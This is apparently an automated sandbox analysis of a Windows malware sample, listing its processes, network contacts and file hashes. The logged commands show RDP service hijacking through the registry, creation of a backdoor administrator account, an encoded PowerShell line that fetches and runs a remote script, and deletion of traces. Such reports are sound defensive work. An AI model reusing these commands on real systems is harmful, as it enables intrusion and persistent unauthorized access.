PID 1624 wrote to memory of 1580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 648 wrote to memory of 1260 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 648 wrote to memory of 1260 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1260 wrote to memory of 3428 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1260 wrote to memory of 3428 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3356 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3356 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1608 wrote to memory of 364 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1608 wrote to memory of 364 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2696 wrote to memory of 3920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2696 wrote to memory of 3920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3920 wrote to memory of 1496 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3920 wrote to memory of 1496 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1752 wrote to memory of 2912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1752 wrote to memory of 2912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2912 wrote to memory of 592 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2912 wrote to memory of 592 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 856 wrote to memory of 3020 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 856 wrote to memory of 3020 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3020 wrote to memory of 3104 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3020 wrote to memory of 3104 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 776 wrote to memory of 3428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 776 wrote to memory of 3428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3428 wrote to memory of 3684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3428 wrote to memory of 3684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3344 wrote to memory of 1572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3344 wrote to memory of 1572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uchmv1dz\uchmv1dz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC6A1.tmp" "c:\Users\Admin\AppData\Local\Temp\uchmv1dz\CSC5785D5D8B7D445B2AC25F685596F5E5.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net.exe

net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc bbBpaooa /add

C:\Windows\system32\net.exe

net.exe user wgautilacc bbBpaooa /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc bbBpaooa /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc bbBpaooa

C:\Windows\system32\net.exe

net.exe user wgautilacc bbBpaooa

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc bbBpaooa

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 34.104.35.123:80 tcp
FR 2.16.119.157:443 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.speedtest.net udp
US 151.101.2.219:80 www.speedtest.net tcp
US 151.101.2.219:443 www.speedtest.net tcp
US 151.101.2.219:80 www.speedtest.net tcp
US 8.8.8.8:53 c.speedtest.net udp
US 151.101.2.219:443 c.speedtest.net tcp
US 8.8.8.8:53 speedtest.nl-ams.llhost-inc.eu udp
NL 5.101.44.180:8080 speedtest.nl-ams.llhost-inc.eu tcp
US 8.8.8.8:53 speedtest.korton.net udp
NL 91.239.33.168:8080 speedtest.korton.net tcp
US 8.8.8.8:53 speedtest.spl.vodafone.nl udp
NL 62.140.138.205:8080 speedtest.spl.vodafone.nl tcp
US 8.8.8.8:53 speedtest2.usenet.farm udp
NL 178.20.174.136:8080 speedtest2.usenet.farm tcp
US 8.8.8.8:53 asgyyya6ychcha.xyz udp

Files

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

\??\c:\Users\Admin\AppData\Local\Temp\uchmv1dz\uchmv1dz.cmdline

MD5 f5f663312b06688928fa5c1065c74068
SHA1 806bda7c6a1ee7afd9be32bdac946218090a393c
SHA256 2b5706f1f3e1d765a06538a6fb8bd528f2c73830372a29150169ab811b693426
SHA512 74b6f308b4e38555d99f52005f544c3c3091bff059d094c6580bc74118a0141d2a97bed32c18490f29ee7978c997c41dca9776d0dc81e7b9b7b81b7aa5bc7423

\??\c:\Users\Admin\AppData\Local\Temp\uchmv1dz\uchmv1dz.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

\??\c:\Users\Admin\AppData\Local\Temp\uchmv1dz\CSC5785D5D8B7D445B2AC25F685596F5E5.TMP

MD5 5c6802aa51c67d981edbfe4a22ba642d
SHA1 2710badb1a8e98c55c0ec7b7c70bf5ab24ef4d48
SHA256 802c81d977ce505523be74e70e110a78c2e3e982ef10de9b408c4ca94392cf2a
SHA512 30e73ab309077a71d02914870f2caf18c471cb4e37c6e38ff3b3f36efff7f3b446aad7fb4f9e42f7f77f44fd7044b4583a83fce49274bd7a055b5aad3d93acee

C:\Users\Admin\AppData\Local\Temp\RESC6A1.tmp

MD5 291ce50da4ce041c974d272777bdef2c
SHA1 43b8a2668fad5c3af341765902d958377aafd9b4
SHA256 2f6e5490788d4212665b0edf4b146f5bd9f12de15155299e9e98df4f67b098fd
SHA512 c820783b43f9ebf683c22413337b6d30b20fe84010af4fea915043362a68fb0ff088ee9d228cd022eaf6a79aebd725c3d266864ace7db9e223ad2c3edcf1de34

C:\Users\Admin\AppData\Local\Temp\uchmv1dz\uchmv1dz.dll

MD5 78060fc38dbf6be82d58073d875733dc
SHA1 d6d3a1a46b2d4f98fea9b5d38ce182c832d85714
SHA256 e0d3aa5228409c0390cba8aa47b0447285862b36970919ecb513f86f961e2dc8
SHA512 d80f4e7a5b81f1a18eb50b2f30fbd5bd0ee64b689dad79973c7defea7093616114f4cf5905bdcc986294f3f050976fc52ac6aa052b7c47afbe5ae586e32b9888

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 f784c76a5f451d89ecd31dc71a8c26cb
SHA1 81b9f4163f834ea3cf133e2be9b8b81279e41c6b
SHA256 8d77e8f87f57c3cc6c5b19ea782763c6a4c3c18ee750357c050543d913e6ac9f
SHA512 5b8fd465141921c4791739fe5186b615594ae47e16c568fe6a640cb67c21aa25b0e1b5910c3eb56cf3a23ce4c6d251664e132a3007956ed3453dce3d1f713981

\Windows\Branding\mediasrv.png

MD5 02de1d05ec7c49607d0469e7731760c6
SHA1 39f0cddc616ab7ccfd0030f9aa257d6603373fb6
SHA256 dcb3e99447dd9c7093c425de2dc13d18342299d6b3876542c8b18542b80ec9eb
SHA512 a33b3da342c96816477347e0dfb6a54b2202990370260aa7fb3de6774c6868a9abef8ec1c794115d927432346153663a600142ca86701adaf1cde2b28f749f82

\Windows\Branding\mediasvc.png

MD5 a82cc23d45b8e1de9897fa40dbfebecb
SHA1 16590d3f0a035e0c01a9959593dd35b5d417a18e
SHA256 300f336a781a00987d35d4db230a14f96d3566ad324d8a5f9b0193095ef3d821
SHA512 b644dc69e2937ce23dd0e49f19bf1541f3e72fc9d1ff1a27d9ec009ad908fc19d8470c11dfe49a305cc9db278d684c31553107f8f4808a157e6c2a3873f5025a
